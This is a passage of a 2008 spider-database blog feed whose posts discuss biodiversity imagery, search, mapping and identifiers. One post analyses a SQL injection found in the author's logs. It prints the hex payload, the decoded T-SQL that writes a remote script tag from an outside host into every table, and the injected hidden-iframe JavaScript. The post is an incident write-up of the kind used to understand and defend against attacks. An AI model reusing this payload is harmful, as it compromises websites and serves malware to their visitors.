While taking images of the epigyna, Nina graciously &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/ContributorImages.asp?Photographer=81"&gt;shared the habitus images&lt;/a&gt; with the Nearctic Spider Database. While in Chicago recently, I chatted with Nina about Picasa. While it comes close to what she wanted, it fell short in a number of areas. The most important in my opinion is findability. Sure, she can tag her images with names, but her gallery is poorly exposed on Google and other search engines. However, there are some features in Picasa that make it attractive. It is relatively easy to upload, manage, and geotag - though the latter could evidently use text boxes if one already has coordinates on hand. Most importantly, the interface is clean, responsive and uncluttered.&lt;br /&gt;&lt;br /&gt;Now the long tail...&lt;br /&gt;&lt;br /&gt;Prior to Nina's efforts, there was very little (if any) linyphiid imagery on the web, especially the specialized images of the epigyna, which are a lot more useful than the habitus images. If you've seen one linyphiid, you've pretty much seen them all (a few exceptions of course). They are remarkably similar in shape &amp; size, but their sexual characters, especially the male's, are dramatically different. The big biodiversity aggregators like the Encyclopedia of Life have positioned themselves to present low hanging fruit. That is, show the furry charismatic megafauna (or fish) because there are many resources serving this sort of content. But, why? Wouldn't it make sense to instead provide better and more useful tools for folks like Nina to create and organize content for which there is either nothing or very little available elsewhere? Let's hope that in time, &lt;a href="http://lifedesk.eol.org"&gt;LifeDesk&lt;/a&gt; will provide a ladder for consumers of content generated there to reach out to the furthest branches and leaves where are found all the curiosities. 
But first, it'll have to contain tools and functionality useful for folks like Nina and for others to jump in and give her a hand.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6308517379985296518?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6308517379985296518/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6308517379985296518' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6308517379985296518'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6308517379985296518'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/10/long-tail-of-biodiversity.html' title='Long Tail of Biodiversity'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/SPINCM169kI/AAAAAAAAAFk/llxI0fatOWI/s72-c/new-1.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7250700314887531840</id><published>2008-07-25T18:55:00.003-06:00</published><updated>2008-07-26T00:26:12.606-06:00</updated><title type='text'>Show Me...Crab Spiders on Bark</title><content type='html'>&lt;a href="http://farm3.static.flickr.com/2297/2247720522_3f40b69687_m.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 
320px;" src="http://farm3.static.flickr.com/2297/2247720522_3f40b69687_m.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://farm1.static.flickr.com/169/467322234_6f0b28f676.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://farm1.static.flickr.com/169/467322234_6f0b28f676.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either there are actually few records cached at GBIF that have this field filled or the data are in such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies and someone with more patience than me could probably develop a natural classification of these terms.&lt;br /&gt;&lt;br /&gt;Faceted search is a first crack at making these data useful, because it certainly opens more trajectories into the data than leaving the field unused. For a first cut at this, I pulled 30 random contributed specimen records from the Nearctic Spider Database for each species and simply display their full contents on the species pages. Then, I index the pages as always using my trusty &lt;a href="http://www.wrensoft.com/zoom/"&gt;Zoom Search&lt;/a&gt;. Voila, a quick way to do some faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. 
Incidentally, Flickr produced 13 and 18 results, respectively but many images are useless.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7250700314887531840?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7250700314887531840/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7250700314887531840' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7250700314887531840'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7250700314887531840'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/show-mecrab-spiders-on-bark.html' title='Show Me...Crab Spiders on Bark'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://farm3.static.flickr.com/2297/2247720522_3f40b69687_t.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4224266218212895426</id><published>2008-07-20T22:08:00.002-06:00</published><updated>2008-07-20T22:12:08.955-06:00</updated><title type='text'>Green Porno</title><content type='html'>I couldn't resist sharing these. Pure genius. 
Kudos to Isabella Rossellini.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a href="http://www.sundancechannel.com/greenporno"&gt;&lt;img src="http://arco.vo.llnwd.net/o2/cust9/FLV/640x480/original/green_porno/bumperstickers/gp_bumpersticker1.jpg" border="0" /&gt;&lt;/a&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4224266218212895426?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4224266218212895426/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4224266218212895426' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4224266218212895426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4224266218212895426'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/green-porno.html' title='Green Porno'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3300345904447715973</id><published>2008-07-20T15:09:00.006-06:00</published><updated>2008-07-20T17:53:43.916-06:00</updated><title type='text'>SQL Injection Attacks!</title><content type='html'>I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called &lt;a href="http://en.wikipedia.org/wiki/SQL_injection"&gt;SQL injection&lt;/a&gt;. 
Here's a portion of one line in the web log:&lt;br /&gt;&lt;blockquote&gt;/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...&lt;strong&gt;more crap here&lt;/strong&gt;...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--&lt;/blockquote&gt;&lt;br /&gt;The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp" and everything else after it is crap that &lt;em&gt;could&lt;/em&gt; be executed on the server. Had I constructed my SQL on the page to be something like:&lt;br /&gt;&lt;blockquote&gt;SELECT * FROM [TABLE] WHERE [COLUMN] = "" &amp; [LETTER F] &amp; ""&lt;/blockquote&gt;&lt;br /&gt;...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:&lt;br /&gt;&lt;blockquote&gt;SELECT * FROM [TABLE] WHERE [COLUMN] = "F"&lt;/blockquote&gt;&lt;br /&gt;...the executed SQL would have been:&lt;br /&gt;&lt;blockquote&gt;SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...&lt;strong&gt;more crap here&lt;/strong&gt;...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--&lt;/blockquote&gt;&lt;br /&gt;Cool.&lt;br /&gt;&lt;br /&gt;So, just what is all that crap? Well, it's a SQL Server-specific bit of code that is HEX-encoded. 
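&lt;br /&gt;&lt;br /&gt;Decoding it takes very little effort. As a rough sketch (Python, purely for illustration), the two hex fragments visible in the log line above can be turned back into text as follows. The middle of the payload is elided in the log excerpt, so it is not reconstructed here, and the names head, tail and decode_hex are made up for this example.&lt;br /&gt;&lt;pre&gt;
```python
# Hex fragments copied from the log line above, without the leading "0x".
# The elided middle of the payload is deliberately not reconstructed.
head = "4445434C415245204054205641524348415228323535292C"
tail = "4445414C4C4F43415445205461626C655F437572736F7220"


def decode_hex(fragment):
    """Turn a run of hex digits into the ASCII text it encodes."""
    return bytes.fromhex(fragment).decode("ascii")


# Print the start and the end of the hidden statement.
print(decode_hex(head))
print(decode_hex(tail))
```
&lt;/pre&gt;Even these two fragments are enough to show that the payload starts by declaring variables and ends by releasing a cursor.&lt;br /&gt;&lt;br /&gt;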
The full decoded HEX is as follows:&lt;br /&gt;&lt;blockquote&gt;DECLARE @T VARCHAR(255),@C VARCHAR(255) &lt;br /&gt;DECLARE Table_Cursor CURSOR FOR&lt;br /&gt;SELECT a.name,b.name FROM sysobjects a,syscolumns b&lt;br /&gt;WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)&lt;br /&gt;OPEN Table_Cursor&lt;br /&gt;FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)&lt;br /&gt;BEGIN&lt;br /&gt;EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''&amp;lt;script src=http://www.bnrc.ru/ngg.js&amp;gt;&amp;lt;/script&amp;gt;''')&lt;br /&gt;FETCH NEXT FROM Table_Cursor INTO @T,@C&lt;br /&gt;END&lt;br /&gt;CLOSE Table_Cursor&lt;br /&gt;DEALLOCATE Table_Cursor&lt;/blockquote&gt;&lt;br /&gt;Hmm. What does this mean? Well, it's an attempt to do something very scary - update every cell in every table to include a reference to a snippet of JavaScript. So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.&lt;br /&gt;&lt;br /&gt;So, what's in the JavaScript? This:&lt;br /&gt;&lt;blockquote&gt;window.status="";&lt;br /&gt;var cookieString = document.cookie;&lt;br /&gt;var start = cookieString.indexOf("dssndd=");&lt;br /&gt;if (start != -1){}else{&lt;br /&gt;var expires = new Date();&lt;br /&gt;expires.setTime(expires.getTime()+9*3600*1000);&lt;br /&gt;document.cookie = "dssndd=update;expires="+expires.toGMTString();&lt;br /&gt;try{&lt;br /&gt;document.write("&amp;lt;iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0&amp;gt;&amp;lt;/iframe&amp;gt;");&lt;br /&gt;}&lt;br /&gt;catch(e)&lt;br /&gt;{&lt;br /&gt;};&lt;br /&gt;}&lt;/blockquote&gt;&lt;br /&gt;OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that loads with the rendering of the page. This is as far as I got. 
But, others have also discovered this and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been affected by this SQL injection attack. So, if you visit a web site, click a link and get mysteriously redirected to msn.com, something may have just happened to your browser.&lt;br /&gt;&lt;br /&gt;But, I still have no idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3300345904447715973?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3300345904447715973/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3300345904447715973' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3300345904447715973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3300345904447715973'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/sql-injection-attacks.html' title='SQL Injection Attacks!'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-5587946970381544650</id><published>2008-07-19T12:57:00.003-06:00</published><updated>2008-07-19T13:12:41.766-06:00</updated><title 
type='text'>Google Geocodes</title><content type='html'>Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Map API and discovered plenty of new great things. For example, folks have developed &lt;a href="http://nicogoeminne.googlepages.com/documentation.html"&gt;reverse geocoders&lt;/a&gt;. It's a shame however that the full &lt;a href="http://www.iso.org/iso/country_codes/iso_3166_code_lists/english_country_names_and_code_elements.htm"&gt;ISO country names&lt;/a&gt; aren't used. Rather, only the country codes are made available via &lt;a href="http://code.google.com/apis/maps/documentation/services.html"&gt;Google's geocode API&lt;/a&gt;. I would have much rather had the full country name and the full "AdministrativeAreaName" (i.e. the State or Province in Google Map API parlance) because I could then use this in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like &lt;a href="http://www.specifysoftware.org/Specify"&gt;Specify&lt;/a&gt; could have taken advantage of this to help users clean or check their data as these are entered.&lt;br /&gt;&lt;br /&gt;Nevertheless, I tweaked my old &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/LocalitiesGeocoder.asp"&gt;Google Map Geocoder&lt;/a&gt; to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of &lt;a href="http://www.apple.com/iphone/features/maps.html"&gt;GPS units and iPhones&lt;/a&gt;, this may be rather pointless. 
But it was fun to see what I could do in an hour or so.&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/data/canada_spiders/LocalitiesGeocoder.asp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/SII7ivYjSLI/AAAAAAAAAFc/3M6j9VqxgPs/s320/reversegeocode.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5224803985724229810" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-5587946970381544650?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/5587946970381544650/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=5587946970381544650' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5587946970381544650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/5587946970381544650'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/google-geocodes.html' title='Google Geocodes'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/SII7ivYjSLI/AAAAAAAAAFc/3M6j9VqxgPs/s72-c/reversegeocode.jpg' height='72' 
width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3207474495992053654</id><published>2008-07-18T09:14:00.004-06:00</published><updated>2008-07-18T09:30:20.734-06:00</updated><title type='text'>Simple Mapper</title><content type='html'>With the recent mapping craze this past decade and the fascination with AJAX tiling, a serious deficiency has been a simple mechanism to produce a black &amp; white line map with points to mark collection locations for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/SimpleMapper.asp"&gt;HERE&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I know, I know, yet another mapping service. But, this one serves a very specific purpose. 
It could no doubt be expanded and made more customizable such as different points for multiple species (a bit tougher) and an option to use a global map instead (trivial), but it's a start to producing something that hopefully satisfies a very different need.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.canadianarachnology.org/data/canada_spiders/SimpleMapper.asp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/SIC2dcwoqDI/AAAAAAAAAFU/gTSjn1_HFOU/s320/mapserv.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5224376184802420786" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3207474495992053654?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3207474495992053654/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3207474495992053654' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3207474495992053654'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3207474495992053654'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/07/simple-mapper.html' title='Simple Mapper'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/SIC2dcwoqDI/AAAAAAAAAFU/gTSjn1_HFOU/s72-c/mapserv.png' height='72' 
width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7014168800112904605</id><published>2008-05-12T05:09:00.007-06:00</published><updated>2008-05-12T05:53:35.167-06:00</updated><title type='text'>Life Science Identifiers (LSIDs) - Why?</title><content type='html'>The &lt;a href="http://www.catalogueoflife.org"&gt;Catalogue of Life&lt;/a&gt; (CoLP) recently released its 2008 checklist and has now implemented Life Science Identifiers (LSIDs). In the past, the Catalogue of Life changed its identifiers with every new version, thus forcing database owners who made use of CoLP names and identifiers to reconstruct their databases if they wished to maintain some sort of external linking to an authoritative source.&lt;br /&gt;&lt;br /&gt;If you're not familiar with LSIDs, here is a description from the SourceForge &lt;a href="http://lsids.sourceforge.net/"&gt;LSID resolution project&lt;/a&gt;:&lt;br /&gt;&lt;blockquote&gt;Life Science Identifiers (LSIDs) are persistent, location-independent, resource identifiers for uniquely naming biologically significant resources including species names, concepts, occurrences, genes or proteins, or data objects that encode information about them. To put it simply, LSIDs are a way to identify and locate pieces of biological information on the web.&lt;/blockquote&gt;This is how LSIDs are constructed:&lt;br /&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/SCgoA8FaVtI/AAAAAAAAAFM/Jez76kopY7o/s400/lsid-syntax-diagram.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5199449766393173714" /&gt;&lt;br /&gt;&lt;br /&gt;So, what can one do with an LSID? Well, given an LSID, one can get some metadata for that data object. This assumes of course that the authority at the other end is alive and ready to serve the metadata. 
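&lt;br /&gt;&lt;br /&gt;To make the layout concrete, here is a minimal Python sketch that splits an LSID into its parts. It assumes the colon-separated form urn:lsid:authority:namespace:object with an optional trailing revision. The function name, the field names and the strictness of the checks are illustrative choices only, not part of any official library. The example identifier is the uBio one quoted further down in this post.&lt;br /&gt;&lt;pre&gt;
```python
from collections import namedtuple

# Field names are illustrative; "revision" is the optional last component.
Lsid = namedtuple("Lsid", "authority namespace object_id revision")


def parse_lsid(text):
    """Split urn:lsid:authority:namespace:object[:revision] into fields."""
    parts = text.split(":")
    if len(parts) not in (5, 6):
        raise ValueError("not an LSID: " + text)
    if parts[0].lower() != "urn" or parts[1].lower() != "lsid":
        raise ValueError("not an LSID: " + text)
    revision = parts[5] if len(parts) == 6 else None
    return Lsid(parts[2], parts[3], parts[4], revision)


print(parse_lsid("urn:lsid:ubio.org:namebank:2072956"))
```
&lt;/pre&gt;The authority field is the piece a resolver has to look up, which is why an authority that is not answering means no metadata.&lt;br /&gt;&lt;br /&gt;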
There is no central authority, as there is with the Digital Object Identifiers (DOIs) used by the publication industry.&lt;br /&gt;&lt;br /&gt;For starters, one can resolve LSIDs using various online resources. Examples:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Biodiversity Information Standards (TDWG): &lt;a href="http://lsid.tdwg.org/"&gt;LSID resolver&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Rod Page: &lt;a href="http://linnaeus.zoology.gla.ac.uk/~rpage/lsid/tester/"&gt;LSID tester&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ol&gt;&lt;br /&gt;Because of the distributed nature of LSID authorities (it's ultimately based on DNS), there is of course nothing preventing the same taxon name from having multiple identifiers or one authority from serving multiple LSIDs for the same taxon name. For example, the namestring for the fishing spider &lt;a href="http://www.canadianarachnology.org/data/spiders/19664"&gt;&lt;em&gt;Dolomedes tenebrosus&lt;/em&gt; Hentz, 1844&lt;/a&gt; has no fewer than three LSIDs from three different authorities:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;uBio:&lt;/strong&gt; urn:lsid:ubio.org:namebank:2072956&lt;br /&gt;&lt;strong&gt;Catalogue of Life 2008:&lt;/strong&gt; urn:lsid:catalogueoflife.org:taxon:f3b7cf14-29c1-102b-9a4a-00304854f820:ac2008 (ugh!)&lt;br /&gt;&lt;strong&gt;The World Spider Catalog:&lt;/strong&gt; urn:lsid:amnh.org:spidersp:019664&lt;br /&gt;&lt;br /&gt;The uBio and the Catalogue of Life LSIDs for this spider resolve, but the AMNH LSID is nothing more than a pointer at this stage because, at the time of writing, AMNH does not yet have a functioning resolution service.&lt;br /&gt;&lt;br /&gt;Which LSID is a database owner supposed to use? Are LSIDs meant to be currencies that either crumble or persist under Darwinian market pressures? 
What I want to do is store an LSID in my relational database such that I can more confidently link names with other sources of information such as information about the type specimens, gene sequences, synonyms, specimens etc. The uBio LSID above is nice and compact, but no one but me and uBio would use it. &lt;a href="http://www.amnh.org/science/divisions/invertzoo/bio.php?scientist=platnick"&gt;Norm Platnick&lt;/a&gt; wasn't aware that uBio had LSIDs for spider names! The World Spider Catalog LSID above is also nice and compact, but it doesn't resolve. The Catalogue of Life LSID is downright awful because I can't merely use the object identification as a stand-alone integer.&lt;br /&gt;&lt;br /&gt;So, I'll continue to use "&lt;em&gt;Dolomedes tenebrosus&lt;/em&gt; Hentz, 1844" thank you very much. A decentralized identifier system is failing me.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7014168800112904605?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7014168800112904605/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7014168800112904605' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7014168800112904605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7014168800112904605'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/05/life-science-identifiers-lsids-why.html' title='Life Science Identifiers (LSIDs) - Why?'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/SCgoA8FaVtI/AAAAAAAAAFM/Jez76kopY7o/s72-c/lsid-syntax-diagram.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4995476045403453015</id><published>2008-04-16T18:19:00.003-06:00</published><updated>2008-04-16T18:42:01.281-06:00</updated><title type='text'>Who's Organizing the Type Specimens</title><content type='html'>Circulating on Taxacom and elsewhere was a note and a petition that has me really worried:&lt;br /&gt;&lt;blockquote&gt;On 26th March 2008 the University Board of Utrecht University, The Netherlands, informed the employees of the Utrecht Herbarium that as of 1 June 2008 the Herbarium is to be closed and, with immediate effect, access to the collections, from national as well as international workers, is to cease.&lt;/blockquote&gt;&lt;br /&gt;The above is straight off the Utrecht University website &lt;a href="http://www.nationale-plantencollectie.nl/HerbariumUtrecht/index-UK.html"&gt;HERE&lt;/a&gt; where you can at least sign the online petition.&lt;br /&gt;&lt;br /&gt;Where is the real source of this alarming decision? Do administrators see the doors to the herbarium as already closed so it's a simple decision to just bolt them shut?&lt;br /&gt;&lt;br /&gt;Tim Robertson (GBIF) has been at the EOL informatics offices these past few days where some interesting ideas have been flying around. One of GBIF's original goals as near as I could remember was to expose the physical location and metadata for type specimens. But, I think a barrier to making this happen was the concentration on a distributed model to harvest and display ALL specimen and observational data in a consistent fashion. These are important sociological considerations but are tangential to the goal. 
What I would love to see is a simple web page for curators to input their type specimen data. Forget about the distributed data model. Type the data in and get an assigned LSID or some other identifier that can be used in perpetuity. Also type in the citation for the original description. Those three bits will serve as the most important scaffolding for all of biology. The metadata schema (if you still think in XML docs) is also laughably easy and the services to be built off this are embarrassingly useful. It is an immense source of pride for institutions (and curators!) to tell the world what type specimens are held behind their walls. Administrators cue in on that.&lt;br /&gt;&lt;br /&gt;Tim Robertson and other developers in the Global informatics community are a passionate bunch and can see around corners, recognize the obstacles, and want the projects they represent to be huge successes. So, congrats Tim for your work on mapping and I hope there are other great things to come.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4995476045403453015?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4995476045403453015/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4995476045403453015' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4995476045403453015'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4995476045403453015'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2008/04/whos-organizing-type-specimens.html' title='Who&apos;s Organizing the Type Specimens'/><author><name>David 
